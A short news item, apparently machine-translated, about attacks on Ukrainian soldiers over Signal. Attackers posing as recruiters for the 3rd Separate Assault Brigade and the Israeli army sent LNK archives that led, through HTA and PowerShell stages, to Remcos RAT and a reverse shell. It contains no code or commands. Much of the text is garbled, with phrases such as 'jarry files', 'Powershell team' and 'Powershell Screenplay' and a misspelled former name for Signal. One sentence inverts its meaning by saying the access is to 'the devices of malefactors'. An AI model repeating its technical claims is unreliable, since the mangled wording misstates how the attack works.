They pretended to be a tsakhal and 3 OSHBR: hackers attacked Ukrainian military in Signal
According to the response team, at the end of December, cybersecurity experts from Trendmicro received information about the detection of suspicious files. As a result, a series of cyberattacks against the military personnel of the Armed Forces of Ukraine was discovered under the guise of recruiting in the 3rd Separate assault brigade and the Army of Defense of Israel (Tsakhal). Cyberattacks were conducted in the Signal messenger, where the archives of LNK files were distributed.
These files trigger a chain of infection with malicious Remcosrat and Reversesh programs, creating specifications for unauthorized remote access to the devices of malefactors. The jarry files contained abused commands for loading and launching the HTA file, which was a computed code that launched a Powershell team for deciphering, decompression and launching of a harmful Powershell Screenplay. This scenario, for its part, downloaded and launched files of a malicious program and document document.
Cert-UA experts noted that the names and content of such documents were very relevant to the military. It is not yet known who is behind this series of cyberattacks, but this incident emphasized the importance of providing cybersecurity of the military Ukrainian army, representatives of the government team noted. Note that Signal is a client for instant messaging and online telephony with a free and open source code. The main focus in development is on privacy and safety.
Until November 2015, the application was called TexseCure and allowed to exchange instant messages. We will remind, in early September we wrote that hackers will break the smartphones of Ukrainians through the fake Telegram and Signal. Applications even appeared at the Google Play Store's official store. The harmful software has recently been removed from there, but it is still a danger.